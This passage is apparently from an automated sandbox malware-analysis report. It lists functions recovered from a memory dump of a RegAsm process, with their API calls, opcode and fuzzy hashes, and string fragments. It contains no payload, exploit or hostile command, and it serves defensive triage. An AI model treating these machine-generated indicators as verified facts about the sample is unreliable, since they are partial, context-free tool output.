                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                            • Opcode ID: 244b091494a9223b10e22d2fe82f580e5546466ba498e3e79f547691520d278a
                                                                                                                                                                                                                                            • Instruction ID: e165f2d26d049d755007d28cc8c893f0f0b674b215a3186d80bca8f901ef9986
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 244b091494a9223b10e22d2fe82f580e5546466ba498e3e79f547691520d278a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 94E0E531E002126AEA302A759C64B5E3E4DBF917E2F190323AC55D3090DB20CC4986E7
                                                                                                                                                                                                                                            Function 0051C260 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0051C020: SetLastError.KERNEL32(000005B6), ref: 0051C0CF
                                                                                                                                                                                                                                            • boost::exception::~exception.LIBCPMTD ref: 0051C2A4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLastboost::exception::~exception
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2030483509-0
                                                                                                                                                                                                                                            • Opcode ID: b80183c7910f2b700772a08d66f6a98778b85add2d4a3e2233c493c267d869ec
                                                                                                                                                                                                                                            • Instruction ID: 0cecc5c32c56923ef7d3b2b7f9c4b75e7af0e2a042226c3a80d4030c7ffd94ce
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b80183c7910f2b700772a08d66f6a98778b85add2d4a3e2233c493c267d869ec
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4DF08C71840649EBCB04EF94C956BAEBB74FB48720F104368F826636C0DB352E00CB91
                                                                                                                                                                                                                                            Function 0050B800 Relevance: 1.3, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharNextA.USER32(00000000,00000000,?,0050B856,0050BE9F,0000002E,00000000,?,0050BE9F), ref: 0050B810
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CharNext
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3213498283-0
                                                                                                                                                                                                                                            • Opcode ID: ed10844057c1b7a6d87709e7a6c7987db8c21fb9f038978cef2d85980a570400
                                                                                                                                                                                                                                            • Instruction ID: aab9afbd044a45454d1ca288d6f8f96450eb21b76fa42f73f465477230c9ede1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ed10844057c1b7a6d87709e7a6c7987db8c21fb9f038978cef2d85980a570400
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4F03930A08248EBEB24CFA4C5D046EBFFDAF46745B248699E805D7250E730DF01EB40

                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                            Function 0042C740 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 492COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 0042C8D2
                                                                                                                                                                                                                                              • Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 0042CAD0
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __aulldiv
                                                                                                                                                                                                                                            • String ID: n{$n{$n{$}{
                                                                                                                                                                                                                                            • API String ID: 3732870572-4154228712
                                                                                                                                                                                                                                            • Opcode ID: 012a2458ca6e2b760dfa09559ea771937154516552ed49889a7a73d748036a86
                                                                                                                                                                                                                                            • Instruction ID: 70a356f546fa94990332de3083992da1d43ecfcf38406400a452c31a5eca1b33
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 012a2458ca6e2b760dfa09559ea771937154516552ed49889a7a73d748036a86
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE126FB1E002189FEB24DF65DC41BEEBBB5BF88304F1481A9E909B7391D6786E448F54
                                                                                                                                                                                                                                            Function 004253B4 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 292stringCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 004254BB
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 00425650
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 00425804
                                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(?,00000000,?,?,?,00000000,0000000A,00000000,0000000A,00000000,eks,?), ref: 00425A4D
                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,~4<<,?,?,?,00000000,0000000A,00000000,0000000A,00000000,eks,?), ref: 00425BBB
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,00000000,eks,?,?,?,?,00000000,0000000A,00000000,0000000A,00000000,eks,?), ref: 00425D17
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __aulldiv$HandleModulelstrcatlstrcpy
                                                                                                                                                                                                                                            • String ID: F$h$n{$n{$n{$}{
                                                                                                                                                                                                                                            • API String ID: 738421922-952531995
                                                                                                                                                                                                                                            • Opcode ID: bc4609a78153c1ea73adaf2e862d15f06e3a373bfbb42b45a12069c310fdbe72
                                                                                                                                                                                                                                            • Instruction ID: 2595606c2507e59a3dd44d25fb3446bff7f2204c6de99bfbe748f4bf13d994ff
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc4609a78153c1ea73adaf2e862d15f06e3a373bfbb42b45a12069c310fdbe72
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54F1D174E052698BDB64DF68C898B9EBBB2BF88304F5481DAD40DA7350DB746E84CF44
                                                                                                                                                                                                                                            Function 004213A0 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 284registryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 00421403
                                                                                                                                                                                                                                              • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
                                                                                                                                                                                                                                              • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 00421448
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 004215B9
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,?,?,?,?,?,?,?,?,0000001C,00000000,0000000A,00000000,?,00007543,00000000), ref: 004215DF
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00421632
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __aulldiv$CloseOpen
                                                                                                                                                                                                                                            • String ID: eks$j3l6lrek$n{$}{
                                                                                                                                                                                                                                            • API String ID: 2588155767-1069243570
                                                                                                                                                                                                                                            • Opcode ID: 09563ad5a95b247886dcb6934c89b28613dfa7d8e7b4cad3cb9ffa0144e504dd
                                                                                                                                                                                                                                            • Instruction ID: e81d9f2a62e681a176fc95b9eb4f9d49adbdfb2158cc2ffbd1ba497f8d536439
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09563ad5a95b247886dcb6934c89b28613dfa7d8e7b4cad3cb9ffa0144e504dd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A9C14C70E002189FDB14CFA4DC95BAEBBB6BF98304F14809AE409B7351DB786A85CF55
                                                                                                                                                                                                                                            Function 00423480 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 284registryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 004234E3
                                                                                                                                                                                                                                              • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
                                                                                                                                                                                                                                              • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 00423528
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 00423699
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,?,?,?,?,?,?,?,?,0000001C,00000000,0000000A,00000000,?,00007543,00000000), ref: 004236BF
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00423712
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __aulldiv$CloseOpen
                                                                                                                                                                                                                                            • String ID: eks$j3l6lrek$n{$}{
                                                                                                                                                                                                                                            • API String ID: 2588155767-1069243570
                                                                                                                                                                                                                                            • Opcode ID: 3bce68d90a4263cb7ec30a460abaaae95c24e061da740a7cd395a78f386f65ef
                                                                                                                                                                                                                                            • Instruction ID: f035b837488ea9a5e5f6d0955b73411dcb8dd9a79673109ba58edece1dff4817
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3bce68d90a4263cb7ec30a460abaaae95c24e061da740a7cd395a78f386f65ef
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5AC14DB0E042189FDB14CFA4DC95BAEBBB5BF88305F14809AE409B7341DB786A85CF55
                                                                                                                                                                                                                                            Function 004411F0 Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 455memoryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 00441384
                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,?,?,?,?,0000001C,00000000,0000000A,00000000,00007543,00000000), ref: 004413AA
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00007543,00000000), ref: 0044156E
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00007543,00000000), ref: 00441844
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast__aulldiv$AllocGlobal
                                                                                                                                                                                                                                            • String ID: eks$j3l6lrek$n{
                                                                                                                                                                                                                                            • API String ID: 2907542317-86532494
                                                                                                                                                                                                                                            • Opcode ID: 283ffd34096faf0dd1b163f2d16aa0d6e05a04cd955b63ae4dd15bdfe621bfb4
                                                                                                                                                                                                                                            • Instruction ID: f2728fd928c076160ce7229c7fb47b5e464f844c07f3019d4160c529f2ac3219
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 283ffd34096faf0dd1b163f2d16aa0d6e05a04cd955b63ae4dd15bdfe621bfb4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D125CB1D002189FEB24DFA4CC81BEEBBB5BB44304F1481AAE509A7391D7786E85CF55
                                                                                                                                                                                                                                            Function 004210E0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 252COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 0042114D
                                                                                                                                                                                                                                              • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
                                                                                                                                                                                                                                              • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 004211CB
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 00421290
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __aulldiv
                                                                                                                                                                                                                                            • String ID: n{$}{
                                                                                                                                                                                                                                            • API String ID: 3732870572-1042045087
                                                                                                                                                                                                                                            • Opcode ID: dcefab8f48aff93b722d70aa59213fa125ac14150980dc289702871d4f65ba08
                                                                                                                                                                                                                                            • Instruction ID: 39d18bead5b9f10a66183ffa85e2edf55d1113fd5e6123dae9e6ec200ec09dc3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dcefab8f48aff93b722d70aa59213fa125ac14150980dc289702871d4f65ba08
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B89145B5E00204AFEB14DFA8DC45FAEB7B6FB98715F208119F909BB390D67869018B54
                                                                                                                                                                                                                                            Function 00440600 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 311COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0053E35A: AcquireSRWLockExclusive.KERNEL32(0058E970,?,-00007535,?,004308C5,00590F6C,?,0000000A,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 0053E365
                                                                                                                                                                                                                                              • Part of subcall function 0053E35A: ReleaseSRWLockExclusive.KERNEL32(0058E970,?,-00007535,?,004308C5,00590F6C,?,0000000A,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 0053E39F
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 00440911
                                                                                                                                                                                                                                              • Part of subcall function 0053E309: AcquireSRWLockExclusive.KERNEL32(0058E970,-00007535,?,004308F2,00590F6C), ref: 0053E313
                                                                                                                                                                                                                                              • Part of subcall function 0053E309: ReleaseSRWLockExclusive.KERNEL32(0058E970,?,004308F2,00590F6C,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 0053E346
                                                                                                                                                                                                                                              • Part of subcall function 0053E309: WakeAllConditionVariable.KERNEL32(0058E96C,?,004308F2,00590F6C,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 0053E351
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExclusiveLock$AcquireRelease$ConditionVariableWake__aulldiv
                                                                                                                                                                                                                                            • String ID: E2'$eks$j3l6lrek$n{
                                                                                                                                                                                                                                            • API String ID: 2808616827-3229564020
                                                                                                                                                                                                                                            • Opcode ID: 3b466c20fe02b138964399a12942c6464082359694b0d242c2c395ffae419570
                                                                                                                                                                                                                                            • Instruction ID: 078cc1524bed649119e76f08d018b24227f6144dc8b09608589f59eab186b588
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b466c20fe02b138964399a12942c6464082359694b0d242c2c395ffae419570
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19E14BB0D002589FDF14DFA5D881BEEBBB1BF58304F14819AE509A7381DB34AA85CF95
                                                                                                                                                                                                                                            Function 0056703D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 188COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Offset
                                                                                                                                                                                                                                            • String ID: Bad dynamic_cast!
                                                                                                                                                                                                                                            • API String ID: 1587990502-2956939130
                                                                                                                                                                                                                                            • Opcode ID: 87541b39ae2e137631827bdbb6531c213785e53ea37b9727a952eb4fc2dbbd03
                                                                                                                                                                                                                                            • Instruction ID: c198e6756d8f64ed2925672eb5c0a825644f8c675b271fc4cbf9cfc7f65daa92
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 87541b39ae2e137631827bdbb6531c213785e53ea37b9727a952eb4fc2dbbd03
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD515D72A04209AFDB14DF68DC85AAA7FA5FF88328F048559FD1597281E731F910CBE0
                                                                                                                                                                                                                                            Function 00560A0D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,2000000B,00560D1F,00000002,00000000,?,?,?,00560D1F,?,00000000), ref: 00560AA6
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20001004,00560D1F,00000002,00000000,?,?,?,00560D1F,?,00000000), ref: 00560ACF
                                                                                                                                                                                                                                            • GetACP.KERNEL32(?,?,00560D1F,?,00000000), ref: 00560AE4
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                                            • String ID: ACP$OCP
                                                                                                                                                                                                                                            • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                            • Opcode ID: ebcad332e2c7c027143238fac012b2802e9cfdeedf4e6ef925141dee2e0f086f
                                                                                                                                                                                                                                            • Instruction ID: 737a64329af9901d05e6d47917e43e6eddcbd1a901434644ddac12d22c904e0b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ebcad332e2c7c027143238fac012b2802e9cfdeedf4e6ef925141dee2e0f086f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F21A432600301AADB35DB94C901A977AA6FB50BD4B16A864E90AD7180F732DD40D750
                                                                                                                                                                                                                                            Function 00560BE9 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0055A0F1: GetLastError.KERNEL32(00000000,[0U,0055D662), ref: 0055A0F5
                                                                                                                                                                                                                                              • Part of subcall function 0055A0F1: SetLastError.KERNEL32(00000000,00000000,-000927C0,00000006,000000FF), ref: 0055A197
                                                                                                                                                                                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00560CF1
                                                                                                                                                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 00560D2F
                                                                                                                                                                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 00560D42
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00560D8A
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00560DA5
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 415426439-0
                                                                                                                                                                                                                                            • Opcode ID: 6fa05b6ed5c8c066af6d9efed3996fb69aedb964f4713671ad22a717301438dc
                                                                                                                                                                                                                                            • Instruction ID: 22cb3e0dd9e87ecbd21cfe83c5cdc24be9763c96d9e9ec9f10e9ac3d832f1453
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6fa05b6ed5c8c066af6d9efed3996fb69aedb964f4713671ad22a717301438dc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35515F71A0020AAFEB10DFA5DC45AAFBBB8BF54700F145569F911E71D0EBB0AE44CB61
                                                                                                                                                                                                                                            Function 00560274 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 254COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0055A0F1: GetLastError.KERNEL32(00000000,[0U,0055D662), ref: 0055A0F5
                                                                                                                                                                                                                                              • Part of subcall function 0055A0F1: SetLastError.KERNEL32(00000000,00000000,-000927C0,00000006,000000FF), ref: 0055A197
                                                                                                                                                                                                                                            • GetACP.KERNEL32(?,?,?,?,?,?,00556036,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00560333
                                                                                                                                                                                                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00556036,?,?,?,00000055,?,-00000050,?,?), ref: 0056036A
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 005604CD
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                                                                                                                                                                            • String ID: utf8
                                                                                                                                                                                                                                            • API String ID: 607553120-905460609
                                                                                                                                                                                                                                            • Opcode ID: ecb3ccac4cfa858dbe3a4f9b5a5d7de6d94c895d147237c99dccbb61dcd39615
                                                                                                                                                                                                                                            • Instruction ID: 4e69425b8d219e4520d202db39861bafbfd5ed4e45ca595549d0b295037e0066
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ecb3ccac4cfa858dbe3a4f9b5a5d7de6d94c895d147237c99dccbb61dcd39615
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC71F671600206ABDB24AB74CC5ABBB7BA8FF44711F14582AFA05DB1C1FB74E944C761
                                                                                                                                                                                                                                            Function 0053F870 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLocaleInfoEx.KERNEL32(!x-sys-default-locale,20000001,00000000,00000002,?,?,0041F6CD,?,00000000), ref: 0053F884
                                                                                                                                                                                                                                            • FormatMessageA.KERNEL32(00001300,00000000,?,00000000,0041F6CD,00000000,00000000,?,?,0041F6CD,?,00000000), ref: 0053F8AB
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FormatInfoLocaleMessage
                                                                                                                                                                                                                                            • String ID: !x-sys-default-locale
                                                                                                                                                                                                                                            • API String ID: 4235545615-2729719199
                                                                                                                                                                                                                                            • Opcode ID: 8d23f896fec52060017de90635f926efe441123acf7e6359c8c5ca0cd7176abf
                                                                                                                                                                                                                                            • Instruction ID: 5feb17b4d3144c6e29b9d70d70cd2a686e8fde12ee576c6e14b381fd652d7c46
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d23f896fec52060017de90635f926efe441123acf7e6359c8c5ca0cd7176abf
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52F03075A10105FFFB089B95DC0ADAFBFACEB09350F004425FA41D6150E2B0AE009770
                                                                                                                                                                                                                                            Function 0054009B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemTimePreciseAsFileTime.KERNEL32(?,?,0056A50D,000000FF,?,0053FD64,?,?,?,?,0042B77B), ref: 005400D3
                                                                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?,CA1D138C,?,?,0056A50D,000000FF,?,0053FD64,?,?,?,?,0042B77B), ref: 005400D7
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Time$FileSystem$Precise
                                                                                                                                                                                                                                            • String ID: uS
                                                                                                                                                                                                                                            • API String ID: 743729956-336044122
                                                                                                                                                                                                                                            • Opcode ID: 2695fee6a449c3401938edb043aae99d86f37b2fdb2fa7f11e92b389907897f7
                                                                                                                                                                                                                                            • Instruction ID: de4ab54f658cddc9c38d3431df4de3107a9968bc7d3f701f869f0e5497b64ae4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2695fee6a449c3401938edb043aae99d86f37b2fdb2fa7f11e92b389907897f7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0FF0E536904654EFCB01CF04DC04F99BBA8FB08B24F10062AEC13F3790D779A9049B90
                                                                                                                                                                                                                                            Function 00560691 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0055A0F1: GetLastError.KERNEL32(00000000,[0U,0055D662), ref: 0055A0F5
                                                                                                                                                                                                                                              • Part of subcall function 0055A0F1: SetLastError.KERNEL32(00000000,00000000,-000927C0,00000006,000000FF), ref: 0055A197
